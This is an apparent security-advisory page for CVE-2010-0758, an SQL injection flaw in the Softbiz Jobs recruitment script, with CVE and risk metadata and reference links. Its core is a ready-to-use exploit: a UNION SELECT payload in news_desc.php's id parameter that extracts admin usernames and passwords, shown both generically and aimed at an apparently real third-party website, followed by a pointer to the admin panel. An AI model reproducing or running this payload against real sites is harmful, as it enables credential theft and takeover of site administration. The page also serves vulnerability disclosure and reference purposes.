Topic : | Softbiz Jobs ( news_desc) SQL Injection Vulnerability
|
SecurityAlert : 7073
CVE : CVE-2010-0758
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Baybora
Published : 04.03.2010
Affected Software : | softbizscripts:softbiz_jobs_and_recruitment_script |
 Advisory Content :
Softbiz Jobs ( news_desc) SQL Injection Vulnerability
###########################
Author : Baybora
Homepage : http://www.1923turk.com
Blog : http://baybora.wordpress.com/
Script : softbizscripts
Download : http://www.softbizscripts.com/
###########################
Exploit :news_desc.php?id=SQL
-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
http://pricebusterdeals.com/news_desc.php?id=-4+union+select+1,concat(usern
ame,0x3a,password),3,4,5+from+sblnk_admin--
http://xxxx/admin
##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci -
X-TRO
##############################################################
References :
http://xforce.iss.net/xforce/xfdb/56453
http://www.securityfocus.com/bid/38344
http://www.exploit-db.com/exploits/11518
http://packetstormsecurity.org/1002-exploits/softbizjobs-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|